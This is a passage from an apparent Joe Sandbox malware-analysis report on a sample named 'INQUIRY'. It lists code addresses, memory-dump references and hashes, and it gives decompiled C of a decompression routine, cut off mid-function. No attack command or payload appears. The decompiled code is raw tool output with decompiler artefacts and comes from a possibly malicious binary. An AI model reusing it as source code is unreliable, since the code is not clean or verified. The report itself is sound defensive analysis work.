                          						}
                          					}
                          				}
                          			}















                          0x00406481
                          0x00406481
                          0x00406481
                          0x00406481
                          0x00406487
                          0x0040648b
                          0x0040648f
                          0x00406499
                          0x004064a7
                          0x0040677d
                          0x0040677d
                          0x00406780
                          0x00406787
                          0x004067b4
                          0x004067b4
                          0x004067b8
                          0x00000000
                          0x00000000
                          0x004067ba
                          0x004067c3
                          0x004067c9
                          0x004067cc
                          0x004067cf
                          0x004067d2
                          0x004067d5
                          0x004067db
                          0x004067f4
                          0x004067f7
                          0x00406803
                          0x00406804
                          0x00406807
                          0x004067dd
                          0x004067dd
                          0x004067ec
                          0x004067ef
                          0x004067ef
                          0x00406811
                          0x004067b1
                          0x004067b1
                          0x004067b1
                          0x004067b4
                          0x004067b8
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00406813
                          0x00406813
                          0x0040678c
                          0x00406790
                          0x004068c8
                          0x004068c8
                          0x004068d2
                          0x004068da
                          0x004068e1
                          0x004068e3
                          0x004068ea
                          0x004068ee
                          0x004068ee
                          0x00406796
                          0x0040679c
                          0x004067a3
                          0x004067ab
                          0x004067ab
                          0x004067ae
                          0x00000000
                          0x004067ae
                          0x00406818
                          0x00406825
                          0x00406828
                          0x00406734
                          0x00406734
                          0x00406734
                          0x00405ed0
                          0x00405ed0
                          0x00405ed0
                          0x00405ed9
                          0x00000000
                          0x00000000
                          0x00405edf
                          0x00405edf
                          0x00000000
                          0x00405ee6
                          0x00405eea
                          0x00000000
                          0x00000000
                          0x00405ef0
                          0x00405ef3
                          0x00405ef6
                          0x00405ef9
                          0x00405efd
                          0x00000000
                          0x00000000
                          0x00405f03
                          0x00405f03
                          0x00405f06
                          0x00405f08
                          0x00405f09
                          0x00405f0c
                          0x00405f0e
                          0x00405f0f
                          0x00405f11
                          0x00405f14
                          0x00405f19
                          0x00405f1e
                          0x00405f27
                          0x00405f3a
                          0x00405f3d
                          0x00405f49
                          0x00405f71
                          0x00405f73
                          0x00405f81
                          0x00405f81
                          0x00405f85
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00405f75
                          0x00405f75
                          0x00405f78
                          0x00405f79
                          0x00405f79
                          0x00000000
                          0x00405f75
                          0x00405f4b
                          0x00405f4f
                          0x00405f54
                          0x00405f54
                          0x00405f5d
                          0x00405f65
                          0x00405f68
                          0x00000000
                          0x00405f6e
                          0x00405f6e
                          0x00000000
                          0x00405f6e
                          0x00000000
                          0x00405f8b
                          0x00405f8b
                          0x00405f8f
                          0x0040683b
                          0x0040683b
                          0x00000000
                          0x0040683b
                          0x00405f95
                          0x00405f98
                          0x00405fa8
                          0x00405fab
                          0x00405fae
                          0x00405fae
                          0x00405fae
                          0x00405fb1
                          0x00405fb5
                          0x00000000
                          0x00000000
                          0x00405fb7
                          0x00405fb7
                          0x00405fbd
                          0x00405fe7
                          0x00405fed
                          0x00405ff4
                          0x00000000
                          0x00405ff4
                          0x00405fbf
                          0x00405fc3
                          0x00405fc6
                          0x00405fcb
                          0x00405fcb
                          0x00405fd6
                          0x00405fde
                          0x00405fe1
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00406026
                          0x0040602c
                          0x0040602f
                          0x0040603c
                          0x00406044
                          0x00000000
                          0x00000000
                          0x00405ffb
                          0x00405ffb
                          0x00405fff
                          0x0040684a
                          0x0040684a
                          0x00000000
                          0x0040684a
                          0x00406005
                          0x0040600b
                          0x00406016
                          0x00406016
                          0x00406016
                          0x00406019
                          0x0040601c
                          0x0040601f
                          0x00406024
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x004066bb
                          0x004066bb
                          0x004066c1
                          0x004066c7
                          0x004066cd
                          0x004066e7
                          0x004066ea
                          0x004066f0
                          0x004066fb
                          0x004066fb
                          0x004066fd
                          0x004066cf
                          0x004066cf
                          0x004066de
                          0x004066e2
                          0x004066e2
                          0x00406707
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00406709
                          0x0040670d
                          0x004068bc
                          0x004068bc
                          0x00000000
                          0x004068bc
                          0x00406713
                          0x00406719
                          0x00406720
                          0x00406728
                          0x0040672b
                          0x0040672e
                          0x0040672e
                          0x00406734
                          0x00406734
                          0x00000000
                          0x00000000
                          0x0040604c
                          0x0040604c
                          0x0040604e
                          0x00406051
                          0x004060c2
                          0x004060c2
                          0x004060c5
                          0x004060c8
                          0x004060cf
                          0x004060d9
                          0x00000000
                          0x004060d9
                          0x00406053
                          0x00406053
                          0x00406057
                          0x0040605a
                          0x0040605c
                          0x0040605f
                          0x00406062
                          0x00406064
                          0x00406067
                          0x00406069
                          0x0040606e
                          0x00406071
                          0x00406074
                          0x00406078
                          0x0040607f
                          0x00406082
                          0x00406089
                          0x0040608d
                          0x00406095
                          0x00406095
                          0x00406095
                          0x0040608f
                          0x0040608f
                          0x0040608f
                          0x00406084
                          0x00406084
                          0x00406084
                          0x00406099
                          0x0040609c
                          0x004060ba
                          0x004060ba
                          0x004060bc
                          0x00000000
                          0x0040609e
                          0x0040609e
                          0x0040609e
                          0x004060a1
                          0x004060a4
                          0x004060a7
                          0x004060a9
                          0x004060a9
                          0x004060a9
                          0x004060ac
                          0x004060af
                          0x004060b1
                          0x004060b2
                          0x004060b5
                          0x00000000
                          0x004060b5
                          0x00000000
                          0x004062eb
                          0x004062eb
                          0x004062ef
                          0x0040630d
                          0x0040630d
                          0x00406310
                          0x00406317
                          0x0040631a
                          0x0040631d
                          0x00406320
                          0x00406323
                          0x00406326
                          0x00406328
                          0x0040632f
                          0x00406330
                          0x00406332
                          0x00406335
                          0x00406338
                          0x0040633b
                          0x0040633b
                          0x00406340
                          0x00000000
                          0x00406340
                          0x004062f1
                          0x004062f1
                          0x004062f4
                          0x004062f7
                          0x00406301
                          0x00000000
                          0x00000000
                          0x00406355
                          0x00406355
                          0x00406359
                          0x0040637c
                          0x0040637f
                          0x00406382
                          0x0040638c
                          0x0040635b
                          0x0040635b
                          0x0040635e
                          0x00406361
                          0x00406364
                          0x00406371
                          0x00406374
                          0x00406374
                          0x00000000
                          0x00000000
                          0x00406398
                          0x00406398
                          0x0040639c
                          0x00000000
                          0x00000000
                          0x004063a2
                          0x004063a2
                          0x004063a6
                          0x00000000
                          0x00000000
                          0x004063ac
                          0x004063ac
                          0x004063ae
                          0x004063b2
                          0x004063b2
                          0x004063b5
                          0x004063b9
                          0x00000000
                          0x00000000
                          0x00406409
                          0x00406409
                          0x0040640d
                          0x00406414
                          0x00406414
                          0x00406417
                          0x0040641a
                          0x00406424
                          0x00000000
                          0x00406424
                          0x0040640f
                          0x0040640f
                          0x00000000
                          0x00000000
                          0x00406430
                          0x00406430
                          0x00406434
                          0x0040643b
                          0x0040643e
                          0x00406441
                          0x00406436
                          0x00406436
                          0x00406436
                          0x00406444
                          0x00406447
                          0x0040644a
                          0x0040644a
                          0x0040644d
                          0x00406450
                          0x00406453
                          0x00406453
                          0x00406456
                          0x0040645d
                          0x00406462
                          0x00000000
                          0x00000000
                          0x004064f0
                          0x004064f0
                          0x004064f4
                          0x00406892
                          0x00406892
                          0x00000000
                          0x00406892
                          0x004064fa
                          0x004064fa
                          0x004064fd
                          0x00406500
                          0x00406504
                          0x00406507
                          0x0040650d
                          0x0040650f
                          0x0040650f
                          0x0040650f
                          0x00406512
                          0x00406515
                          0x00000000
                          0x00000000
                          0x004060e5
                          0x004060e5
                          0x004060e9
                          0x00406856
                          0x00406856
                          0x00000000
                          0x00406856
                          0x004060ef
                          0x004060ef
                          0x004060f2
                          0x004060f5
                          0x004060f9
                          0x004060fc
                          0x00406102
                          0x00406104
                          0x00406104
                          0x00406104
                          0x00406107
                          0x0040610a
                          0x0040610a
                          0x0040610d
                          0x00406110
                          0x00000000
                          0x00000000
                          0x00406116
                          0x00406116
                          0x0040611c
                          0x00000000
                          0x00000000
                          0x00406122
                          0x00406122
                          0x00406126
                          0x00406129
                          0x0040612c
                          0x0040612f
                          0x00406132
                          0x00406133
                          0x00406136
                          0x00406138
                          0x0040613e
                          0x00406141
                          0x00406144
                          0x00406147
                          0x0040614a
                          0x0040614d
                          0x00406150
                          0x0040616c
                          0x0040616f
                          0x00406172
                          0x00406175
                          0x0040617c
                          0x00406180
                          0x00406182
                          0x00406186
                          0x00406152
                          0x00406152
                          0x00406156
                          0x0040615e
                          0x00406163
                          0x00406165
                          0x00406167
                          0x00406167
                          0x00406189
                          0x00406190
                          0x00406193
                          0x00000000
                          0x00406199
                          0x00406199
                          0x00000000
                          0x00406199
                          0x00000000
                          0x0040619e
                          0x0040619e
                          0x004061a2
                          0x00406862
                          0x00406862
                          0x00000000
                          0x00406862
                          0x004061a8
                          0x004061a8
                          0x004061ab
                          0x004061ae
                          0x004061b2
                          0x004061b5
                          0x004061bb
                          0x004061bd
                          0x004061bd
                          0x004061bd
                          0x004061c0
                          0x004061c3
                          0x004061c3
                          0x004061c3
                          0x004061c9
                          0x00000000
                          0x00000000
                          0x004061cb
                          0x004061cb
                          0x004061ce
                          0x004061d1
                          0x004061d4
                          0x004061d7
                          0x004061da
                          0x004061dd
                          0x004061e0
                          0x004061e3
                          0x004061e6
                          0x004061e9
                          0x00406201
                          0x00406204
                          0x00406207
                          0x0040620a
                          0x0040620a
                          0x0040620d
                          0x00406211
                          0x00406213
                          0x004061eb
                          0x004061eb
                          0x004061f3
                          0x004061f8
                          0x004061fa
                          0x004061fc
                          0x004061fc
                          0x00406216
                          0x0040621d
                          0x00406220
                          0x00000000
                          0x00406222
                          0x00406222
                          0x00000000
                          0x00406222
                          0x00406220
                          0x00406227
                          0x00406227
                          0x00406227
                          0x00406227
                          0x00000000
                          0x00000000
                          0x00406262
                          0x00406262
                          0x00406266
                          0x0040686e
                          0x0040686e
                          0x00000000
                          0x0040686e
                          0x0040626c
                          0x0040626c
                          0x0040626f
                          0x00406272
                          0x00406276
                          0x00406279
                          0x0040627f
                          0x00406281
                          0x00406281
                          0x00406281
                          0x00406284
                          0x00406287
                          0x00406287
                          0x0040628d
                          0x0040622b
                          0x0040622b
                          0x0040622e
                          0x00000000
                          0x0040622e
                          0x0040628f
                          0x0040628f
                          0x00406292
                          0x00406295
                          0x00406298
                          0x0040629b
                          0x0040629e
                          0x004062a1
                          0x004062a4
                          0x004062a7
                          0x004062aa
                          0x004062ad
                          0x004062c5
                          0x004062c8
                          0x004062cb
                          0x004062ce
                          0x004062ce
                          0x004062d1
                          0x004062d5
                          0x004062d7
                          0x004062af
                          0x004062af
                          0x004062b7
                          0x004062bc
                          0x004062be
                          0x004062c0
                          0x004062c0
                          0x004062da
                          0x004062e1
                          0x004062e4
                          0x00000000
                          0x004062e6
                          0x004062e6
                          0x00000000
                          0x004062e6
                          0x00000000
                          0x00406573
                          0x00406573
                          0x00406577
                          0x0040689e
                          0x0040689e
                          0x00000000
                          0x0040689e
                          0x0040657d
                          0x0040657d
                          0x00406580
                          0x00406583
                          0x00406587
                          0x0040658a
                          0x00406590
                          0x00406592
                          0x00406592
                          0x00406592
                          0x00406595
                          0x00000000
                          0x00000000
                          0x00406343
                          0x00406343
                          0x00406346
                          0x00000000
                          0x00000000
                          0x00406682
                          0x00406682
                          0x00406686
                          0x004066a8
                          0x004066a8
                          0x004066ab
                          0x004066b5
                          0x004066b8
                          0x004066b8
                          0x00000000
                          0x004066b8
                          0x00406688
                          0x00406688
                          0x0040668b
                          0x0040668f
                          0x00406692
                          0x00406692
                          0x00406695
                          0x00000000
                          0x00000000
                          0x0040673f
                          0x0040673f
                          0x00406743
                          0x00406761
                          0x00406761
                          0x00406761
                          0x00406761
                          0x00406768
                          0x0040676f
                          0x00406776
                          0x00406776
                          0x0040677d
                          0x00406780
                          0x00406787
                          0x00000000
                          0x0040678a
                          0x00406745
                          0x00406745
                          0x00406748
                          0x0040674b
                          0x0040674e
                          0x00406755
                          0x00406699
                          0x00406699
                          0x0040669c
                          0x00000000
                          0x00000000
                          0x00406830
                          0x00406830
                          0x00406833
                          0x00406734
                          0x00406734
                          0x00406734
                          0x00000000
                          0x0040673a
                          0x00000000
                          0x0040646a
                          0x0040646a
                          0x0040646c
                          0x00406473
                          0x00406474
                          0x00406476
                          0x00406479
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0040677d
                          0x0040677d
                          0x00406780
                          0x00406787
                          0x00000000
                          0x0040678a
                          0x00000000
                          0x00000000
                          0x00000000
                          0x004064af
                          0x004064af
                          0x004064b2
                          0x004064e8
                          0x004064e8
                          0x00406618
                          0x00406618
                          0x00406618
                          0x00406618
                          0x0040661b
                          0x0040661b
                          0x0040661e
                          0x00406620
                          0x004068aa
                          0x004068aa
                          0x00000000
                          0x004068aa
                          0x00406626
                          0x00406626
                          0x00406629
                          0x00000000
                          0x00000000
                          0x0040662f
                          0x0040662f
                          0x00406633
                          0x00406636
                          0x00406636
                          0x00406636
                          0x00000000
                          0x00406636
                          0x004064b4
                          0x004064b4
                          0x004064b6
                          0x004064b8
                          0x004064ba
                          0x004064bd
                          0x004064be
                          0x004064c0
                          0x004064c2
                          0x004064c5
                          0x004064c8
                          0x004064de
                          0x004064de
                          0x004064e3
                          0x0040651b
                          0x0040651b
                          0x0040651f
                          0x00406548
                          0x0040654b
                          0x0040654d
                          0x00406554
                          0x00406557
                          0x0040655a
                          0x0040655a
                          0x0040655f
                          0x0040655f
                          0x00406561
                          0x00406564
                          0x0040656b
                          0x0040656e
                          0x0040659b
                          0x0040659b
                          0x0040659e
                          0x004065a1
                          0x00406615
                          0x00406615
                          0x00406615
                          0x00406615
                          0x00000000
                          0x00406615
                          0x004065a3
                          0x004065a3
                          0x004065a9
                          0x004065ac
                          0x004065af
                          0x004065b2
                          0x004065b5
                          0x004065b8
                          0x004065bb
                          0x004065be
                          0x004065c1
                          0x004065c4
                          0x004065dd
                          0x004065df
                          0x004065e2
                          0x004065e3
                          0x004065e6
                          0x004065e8
                          0x004065eb
                          0x004065ed
                          0x004065ef
                          0x004065f2
                          0x004065f4
                          0x004065f7
                          0x004065fb
                          0x004065fd
                          0x004065fd
                          0x004065fe
                          0x00406601
                          0x00406604
                          0x004065c6
                          0x004065c6
                          0x004065ce
                          0x004065d3
                          0x004065d5
                          0x004065d8
                          0x004065d8
                          0x00406607
                          0x0040660e
                          0x00406598
                          0x00406598
                          0x00406598
                          0x00406598
                          0x00000000
                          0x00406610
                          0x00406610
                          0x00000000
                          0x00406610
                          0x0040660e
                          0x00406521
                          0x00406521
                          0x00406524
                          0x00406526
                          0x00406529
                          0x0040652c
                          0x0040652f
                          0x00406531
                          0x00406534
                          0x00406537
                          0x00406537
                          0x0040653a
                          0x0040653a
                          0x0040653d
                          0x00406544
                          0x00406518
                          0x00406518
                          0x00406518
                          0x00406518
                          0x00000000
                          0x00406546
                          0x00406546
                          0x00000000
                          0x00406546
                          0x00406544
                          0x004064ca
                          0x004064ca
                          0x004064cd
                          0x004064cf
                          0x004064d2
                          0x00000000
                          0x00000000
                          0x00406231
                          0x00406231
                          0x00406235
                          0x0040687a
                          0x0040687a
                          0x00000000
                          0x0040687a
                          0x0040623b
                          0x0040623b
                          0x0040623e
                          0x00406241
                          0x00406244
                          0x00406247
                          0x0040624a
                          0x0040624d
                          0x0040624f
                          0x00406252
                          0x00406255
                          0x00406258
                          0x0040625a
                          0x0040625a
                          0x0040625a
                          0x00000000
                          0x00000000
                          0x004063bc
                          0x004063bc
                          0x004063c0
                          0x00406886
                          0x00406886
                          0x00000000
                          0x00406886
                          0x004063c6
                          0x004063c6
                          0x004063c9
                          0x004063cc
                          0x004063cf
                          0x004063d1
                          0x004063d1
                          0x004063d1
                          0x004063d4
                          0x004063d7
                          0x004063da
                          0x004063dd
                          0x004063e0
                          0x004063e3
                          0x004063e4
                          0x004063e6
                          0x004063e6
                          0x004063e6
                          0x004063e9
                          0x004063ec
                          0x004063ef
                          0x004063f2
                          0x004063f2
                          0x004063f2
                          0x004063f5
                          0x004063f7
                          0x004063f7
                          0x00000000
                          0x00000000
                          0x00406639
                          0x00406639
                          0x00406639
                          0x0040663d
                          0x00000000
                          0x00000000
                          0x00406643
                          0x00406643
                          0x00406646
                          0x00406649
                          0x0040664c
                          0x0040664e
                          0x0040664e
                          0x0040664e
                          0x00406651
                          0x00406654
                          0x00406657
                          0x0040665a
                          0x0040665d
                          0x00406660
                          0x00406661
                          0x00406663
                          0x00406663
                          0x00406663
                          0x00406666
                          0x00406669
                          0x0040666c
                          0x0040666f
                          0x00406672
                          0x00406676
                          0x00406678
                          0x0040667b
                          0x00000000
                          0x0040667d
                          0x0040667d
                          0x004063fa
                          0x004063fa
                          0x00000000
                          0x004063fa
                          0x0040667b
                          0x004068b0
                          0x004068b0
                          0x00000000
                          0x00000000
                          0x00405edf
                          0x004068e7
                          0x004068e7
                          0x00000000
                          0x004068e7
                          0x00406734
                          0x004067b4
                          0x0040677d

                          Memory Dump Source
                          • Source File: 00000001.00000002.664521633.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000001.00000002.664492604.0000000000400000.00000002.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664553767.0000000000407000.00000002.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664560673.0000000000409000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664622300.0000000000422000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664638912.0000000000429000.00000004.00020000.sdmpDownload File
                          • Associated: 00000001.00000002.664643458.000000000042C000.00000002.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_400000_INQUIRY.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4704a5ed105780f6478b7403eb4dd8ec19d01cc9a077ced7c1a67cf9ab5ccc14
                          • Instruction ID: 5ae99ca79f71cc2638d3baaeb57d6c4ee888c8cbc78e3ce5cc4ffc2d3191f51a
                          • Opcode Fuzzy Hash: 4704a5ed105780f6478b7403eb4dd8ec19d01cc9a077ced7c1a67cf9ab5ccc14
                          • Instruction Fuzzy Hash: 1FA13571D00229CBDF28CFA8C854BADBBB1FF44305F15816AD816BB281D7785A86DF44
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 98%
                          			E00406682() {
                          				void _t533;
                          				signed int _t534;
                          				signed int _t535;
                          				signed int* _t605;
                          				void* _t612;
                          
                          				L0:
                          				while(1) {
                          					L0:
                          					if( *(_t612 - 0x40) != 0) {
                          						 *(_t612 - 0x84) = 0x13;
                          						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
                          						goto L132;
                          					} else {
                          						__eax =  *(__ebp - 0x4c);
                          						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                          						__ecx =  *(__ebp - 0x58);
                          						__eax =  *(__ebp - 0x4c) << 4;
                          						__eax =  *(__ebp - 0x58) + __eax + 4;
                          						L130:
                          						 *(__ebp - 0x58) = __eax;
                          						 *(__ebp - 0x40) = 3;
                          						L144:
                          						 *(__ebp - 0x7c) = 0x14;
                          						L145:
                          						__eax =  *(__ebp - 0x40);
                          						 *(__ebp - 0x50) = 1;
                          						 *(__ebp - 0x48) =  *(__ebp - 0x40);
                          						L149:
                          						if( *(__ebp - 0x48) <= 0) {
                          							__ecx =  *(__ebp - 0x40);
                          							__ebx =  *(__ebp - 0x50);
                          							0 = 1;
                          							__eax = 1 << __cl;
                          							__ebx =  *(__ebp - 0x50) - (1 << __cl);
                          							__eax =  *(__ebp - 0x7c);
                          							 *(__ebp - 0x44) = __ebx;
                          							while(1) {
                          								L140:
                          								 *(_t612 - 0x88) = _t533;
                          								while(1) {
                          									L1:
                          									_t534 =  *(_t612 - 0x88);
                          									if(_t534 > 0x1c) {
                          										break;
                          									}
                          									switch( *((intOrPtr*)(_t534 * 4 +  &M004068EF))) {
                          										case 0:
                          											if( *(_t612 - 0x6c) == 0) {
                          												goto L170;
                          											}
                          											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                          											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                          											_t534 =  *( *(_t612 - 0x70));
                          											if(_t534 > 0xe1) {
                          												goto L171;
                          											}
                          											_t538 = _t534 & 0x000000ff;
                          											_push(0x2d);
                          											asm("cdq");
                          											_pop(_t569);
                          											_push(9);
                          											_pop(_t570);
                          											_t608 = _t538 / _t569;
                          											_t540 = _t538 % _t569 & 0x000000ff;
                          											asm("cdq");
                          											_t603 = _t540 % _t570 & 0x000000ff;
                          											 *(_t612 - 0x3c) = _t603;
                          											 *(_t612 - 0x1c) = (1 << _t608) - 1;
                          											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
                          											_t611 = (0x300 << _t603 + _t608) + 0x736;
                          											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
                          												L10:
                          												if(_t611 == 0) {
                          													L12:
                          													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
                          													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
                          													goto L15;
                          												} else {
                          													goto L11;
                          												}
                          												do {
                          													L11:
                          													_t611 = _t611 - 1;
                          													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
                          												} while (_t611 != 0);
                          												goto L12;
                          											}
                          											if( *(_t612 - 4) != 0) {
                          												GlobalFree( *(_t612 - 4));
                          											}
                          											_t534 = GlobalAlloc(0x40, 0x600); // executed
                          											 *(_t612 - 4) = _t534;
                          											if(_t534 == 0) {
                          												goto L171;
                          											} else {
                          												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
                          												goto L10;
                          											}
                          										case 1:
                          											L13:
                          											__eflags =  *(_t612 - 0x6c);
                          											if( *(_t612 - 0x6c) == 0) {
                          												 *(_t612 - 0x88) = 1;
                          												goto L170;
                          											}
                          											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                          											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
                          											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                          											_t45 = _t612 - 0x48;
                          											 *_t45 =  *(_t612 - 0x48) + 1;
                          											__eflags =  *_t45;
                          											L15:
                          											if( *(_t612 - 0x48) < 4) {
                          												goto L13;
                          											}
                          											_t546 =  *(_t612 - 0x40);
                          											if(_t546 ==  *(_t612 - 0x74)) {
                          												L20:
                          												 *(_t612 - 0x48) = 5;
                          												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
                          												goto L23;
                          											}
                          											 *(_t612 - 0x74) = _t546;
                          											if( *(_t612 - 8) != 0) {
                          												GlobalFree( *(_t612 - 8));
                          											}
                          											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
                          											 *(_t612 - 8) = _t534;
                          											if(_t534 == 0) {
                          												goto L171;
                          											} else {
                          												goto L20;
                          											}
                          										case 2:
                          											L24:
                          											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
                          											 *(_t612 - 0x84) = 6;
                          											 *(_t612 - 0x4c) = _t553;
                          											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
                          											goto L132;
                          										case 3:
                          											L21:
                          											__eflags =  *(_t612 - 0x6c);
                          											if( *(_t612 - 0x6c) == 0) {
                          												 *(_t612 - 0x88) = 3;
                          												goto L170;
                          											}
                          											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                          											_t67 = _t612 - 0x70;
                          											 *_t67 =  &(( *(_t612 - 0x70))[1]);
                          											__eflags =  *_t67;
                          											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
                          											L23:
                          											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
                          											if( *(_t612 - 0x48) != 0) {
                          												goto L21;
                          											}
                          											goto L24;
                          										case 4:
                          											L133:
                          											_t531 =  *_t605;
                          											_t588 = _t531 & 0x0000ffff;
                          											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
                          											if( *(_t612 - 0xc) >= _t564) {
                          												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
                          												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
                          												 *(_t612 - 0x40) = 1;
                          												_t532 = _t531 - (_t531 >> 5);
                          												__eflags = _t532;
                          												 *_t605 = _t532;
                          											} else {
                          												 *(_t612 - 0x10) = _t564;
                          												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
                          												 *_t605 = (0x800 - _t588 >> 5) + _t531;
                          											}
                          											if( *(_t612 - 0x10) >= 0x1000000) {
                          												goto L139;
                          											} else {
                          												goto L137;
                          											}
                          										case 5:
                          											L137:
                          											if( *(_t612 - 0x6c) == 0) {
                          												 *(_t612 - 0x88) = 5;
                          												goto L170;
                          											}
                          											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
                          											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                          											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                          											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
                          											L139:
                          											_t533 =  *(_t612 - 0x84);
                          											goto L140;
                          										case 6:
                          											__edx = 0;
                          											__eflags =  *(__ebp - 0x40);
                          											if( *(__ebp - 0x40) != 0) {
                          												__eax =  *(__ebp - 4);
                          												__ecx =  *(__ebp - 0x38);
                          												 *(__ebp - 0x34) = 1;
                          												 *(__ebp - 0x84) = 7;
                          												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                          												goto L132;
                          											}
                          											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                          											__esi =  *(__ebp - 0x60);
                          											__cl = 8;
                          											__cl = 8 -  *(__ebp - 0x3c);
                          											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                          											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                          											__ecx =  *(__ebp - 0x3c);
                          											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                          											__ecx =  *(__ebp - 4);
                          											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                          											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                          											__eflags =  *(__ebp - 0x38) - 4;
                          											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                          											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                          											if( *(__ebp - 0x38) >= 4) {
                          												__eflags =  *(__ebp - 0x38) - 0xa;
                          												if( *(__ebp - 0x38) >= 0xa) {
                          													_t98 = __ebp - 0x38;
                          													 *_t98 =  *(__ebp - 0x38) - 6;
                          													__eflags =  *_t98;
                          												} else {
                          													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                          												}
                          											} else {
                          												 *(__ebp - 0x38) = 0;
                          											}
                          											__eflags =  *(__ebp - 0x34) - __edx;
                          											if( *(__ebp - 0x34) == __edx) {
                          												__ebx = 0;
                          												__ebx = 1;
                          												goto L61;
                          											} else {
                          												__eax =  *(__ebp - 0x14);
                          												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                          												__eflags = __eax -  *(__ebp - 0x74);
                          												if(__eax >=  *(__ebp - 0x74)) {
                          													__eax = __eax +  *(__ebp - 0x74);
                          													__eflags = __eax;
                          												}
                          												__ecx =  *(__ebp - 8);
                          												__ebx = 0;
                          												__ebx = 1;
                          												__al =  *((intOrPtr*)(__eax + __ecx));
                          												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                          												goto L41;
                          											}
                          										case 7:
                          											__eflags =  *(__ebp - 0x40) - 1;
                          											if( *(__ebp - 0x40) != 1) {
                          												__eax =  *(__ebp - 0x24);
                          												 *(__ebp - 0x80) = 0x16;
                          												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                          												__eax =  *(__ebp - 0x28);
                          												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                          												__eax =  *(__ebp - 0x2c);
                          												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                          												__eax = 0;
                          												__eflags =  *(__ebp - 0x38) - 7;
                          												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                          												__al = __al & 0x000000fd;
                          												__eax = (__eflags >= 0) - 1 + 0xa;
                          												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
